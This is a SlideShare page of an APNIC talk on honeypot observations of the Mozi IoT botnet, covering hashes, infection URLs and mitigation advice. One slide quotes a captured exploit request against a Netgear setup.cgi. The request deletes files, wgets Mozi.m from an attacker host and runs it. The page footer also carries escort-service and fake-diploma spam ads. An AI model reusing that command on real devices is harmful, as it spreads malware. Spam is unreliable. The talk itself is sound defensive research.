SlideShare una empresa de Scribd logo

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

APNIC
APNIC

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.

Internet
1 de 17
Descargar para leer sin conexión
Observations from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist APNIC adli@apnic.net || www.apnic.net 1
Let’s Connect! • LinkedIn: Adli Wahid • Email: adli@apnic.net 2
Discussion 1. Background 2. Mozi (IoT) Botnet 3. Observations 4. Mitigation & Remediation Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research & presentation 3
Background (Source of Data) • APNIC Community Honeynet Project oCollaboration with partners across AP oIncluding capacity building related activities • Honeypots & Honeynet oAnything that interact with the honeypots is suspect oConfirmed with observed actions + artifacts (payload, logs, etc) • Types of Honeypots oTelnet/SSH (Cowrie) ** relevant for this talk o100++ sensors 4
What We Observe • Attacks that spread via o SSH & Telnet bruteforce o Exploiting _known_ vulnerabilities • Nature of o Malware - cryptominers, ddos agents, etc o Source of attack == infected devices* • Left of the Hack o Observations on attacker’s infrastructure o Bot recruitments o Scripts, malware payload, traffic • Attacks that no one pays attention to ☺ • Share feeds with network operators (DASH) & partners 5 DDoS Attack timeline Build/Buy Infrastructure • Write malware • Infect devices • Setup Command & Control “Left of the Hack” “The Hack”
Mozi Botnet • Discovered in September 2019 by Netlab • Significant outbreak in Sept 2020 (100k nodes) • Targets IoT devices (MIPs, ARM, PPC and x86) • Uses unique P2P Command & Control o BitTorrent Distributed Hash Table (DHT) as carrier protocol o Makes it robust & tricky* to track • Some capabilities (from config) o Perform a Ddos attack o Update executable from given URL o Execute command via shell or system() o DNS Spoofing o HTTP Session Hijacking (with JS) o Mining • Code base from other botnets o Gafgyt o Mirai • Propagation o 14 HTTP based exploits of via web interface of IoT Devices o Mainly Telnet**, FTP, SSH credentials brute-force 6
7 Nmap scan report for host-x.static.[redacted].net (219.x.y.184) Host is up (0.062s latency). PORT STATE SERVICE VERSION 53387/tcp open elf-exe ELF 32-bit executable file This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR
Mozi Author ”taken custody” by LEA in 2021 https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ Is it still around? 8
2022 - Still Active? durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] "GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*; wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear; sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0 Check your webserver logs for Mozi.a or Mozi.m 9
Observations in APNIC Honeynet Project • In 05/2022, we observed an ELF binary “.i” in some URLs o Post-login downloads • Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i • IP in URL can be the same as attacking host or different Source IP (attacking/spreading) IP hosting binary:random_port o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766 o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134 o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724 o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224 o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764 o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134 o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273 10 1. Telnet username:password 2. wget http://x.x.x.x:nnnn/.1
The “.i” & Finding Mozi o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped • SHA256 a04ac6d98ad989312783d4fe3456c53730b212c79 a426fb215708b6c6daa3de3 o Known to VirusTotal • Finding Mozi • Maybe we can find Mozi.m or Mozi.a on the webserver? o If .i in $IP:PORT o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config 11
Observations – (hash) fingerprints :~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m 9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i 479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m 6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i 23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m 289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i 12
Slowly increasing last 7 months Daily Hits 13 Snapshot on 14/22/2022
IPs from AP Region (Last 7 Months) [Snippet] • 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common] • 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative] • 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender] 14 IPs from AP region by Operators 67%
Mitigation & Remediation (not just Mozi) • The Usual Advice oHarden Device – Patch, Strong Credentials, Access Controls ▪ But whose job is it anyways to monitor & remediate? ▪ Vulnerabilities sustain ‘old’ worm & bots oTL;DR – Same Story oThere must be a better way oResponding after the fact • Engagement with other stakeholders on the impact of insecure IoTs, Awareness, Policies, PSIRTs • Strengthen collaboration & the Eco-system 15
Thank You! Adli Wahid <adli@apnic.net> 16
Resources 1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/ 2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its- lingering-bots/ 3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/ 4. https://www.microsoft.com/security/blog/2021/08/19/how-to- proactively-defend-against-mozi-iot-botnet/ 5. ShadowServer Foundation - https://www.shadowserver.org/what- we-do/network-reporting/get-reports/ 6. APNIC DASH – https://dash.apnic.net 7. APNIC Community Honeynet Project – adli@apnic.net 17

Recomendados

38th TWNIC OPM: Observations and mitigation of Mozi botnet
38th TWNIC OPM: Observations and mitigation of Mozi botnet 38th TWNIC OPM: Observations and mitigation of Mozi botnet
38th TWNIC OPM: Observations and mitigation of Mozi botnet
APNIC
 
Observations and mitigation of Mozi botnet, presentation for mn NOG 4
Observations and mitigation of Mozi botnet, presentation for mn NOG 4Observations and mitigation of Mozi botnet, presentation for mn NOG 4
Observations and mitigation of Mozi botnet, presentation for mn NOG 4
APNIC
 
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
APNIC
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 
Unifi'd Ownage
Unifi'd OwnageUnifi'd Ownage
Unifi'd Ownage
Tim N
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 

Recomendados

38th TWNIC OPM: Observations and mitigation of Mozi botnet
38th TWNIC OPM: Observations and mitigation of Mozi botnet 38th TWNIC OPM: Observations and mitigation of Mozi botnet
38th TWNIC OPM: Observations and mitigation of Mozi botnet
APNIC
 
Observations and mitigation of Mozi botnet, presentation for mn NOG 4
Observations and mitigation of Mozi botnet, presentation for mn NOG 4Observations and mitigation of Mozi botnet, presentation for mn NOG 4
Observations and mitigation of Mozi botnet, presentation for mn NOG 4
APNIC
 
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
APNIC
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 
Unifi'd Ownage
Unifi'd OwnageUnifi'd Ownage
Unifi'd Ownage
Tim N
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)
André Fucs de Miranda
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
RootedCON
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
Open source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisOpen source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysis
GTKlondike
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
APNIC
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsD1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via sms
qqlan
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
Felipe Prado
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
APNIC
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
Zoltan Balazs
 
(130727) #fitalk anonymous network concepts and implementation
(130727) #fitalk anonymous network concepts and implementation(130727) #fitalk anonymous network concepts and implementation
(130727) #fitalk anonymous network concepts and implementation
INSIGHT FORENSIC
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Criminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and FutureCriminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and Future
Jim Lippard
 
Deploy your own P2P network
Deploy your own P2P networkDeploy your own P2P network
Deploy your own P2P network
Dobrica Pavlinušić
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
Lyon Yang
 
MNSEC Conference 2023: Mining Bots
MNSEC Conference 2023: Mining BotsMNSEC Conference 2023: Mining Bots
MNSEC Conference 2023: Mining Bots
APNIC
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
 
IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013
Zivaro Inc
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
Andrew Case
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC
 

Más contenido relacionado

Similar a Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)
André Fucs de Miranda
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
RootedCON
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
Open source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisOpen source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysis
GTKlondike
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsD1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via sms
qqlan
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
Zoltan Balazs
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Criminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and FutureCriminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and Future
Jim Lippard
 

Similar a Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022 (20)

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)New Botnets Trends and Threats (BH Europe 2007)
New Botnets Trends and Threats (BH Europe 2007)
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Open source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisOpen source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysis
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsD1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via sms
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
 
(130727) #fitalk anonymous network concepts and implementation
(130727) #fitalk anonymous network concepts and implementation(130727) #fitalk anonymous network concepts and implementation
(130727) #fitalk anonymous network concepts and implementation
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Criminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and FutureCriminals in the Cloud: Past, Present, and Future
Criminals in the Cloud: Past, Present, and Future
 
Deploy your own P2P network
Deploy your own P2P networkDeploy your own P2P network
Deploy your own P2P network
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
MNSEC Conference 2023: Mining Bots
MNSEC Conference 2023: Mining BotsMNSEC Conference 2023: Mining Bots
MNSEC Conference 2023: Mining Bots
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 

Más de APNIC

Más de APNIC (20)

APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 

Último

一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
pxcywzqs
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Monica Sydney
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Monica Sydney
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
F
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
ydyuyu
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Monica Sydney
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
ayvbos
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
ydyuyu
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
ydyuyu
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
JOHNBEBONYAP1
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
F
 

Último (20)

一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
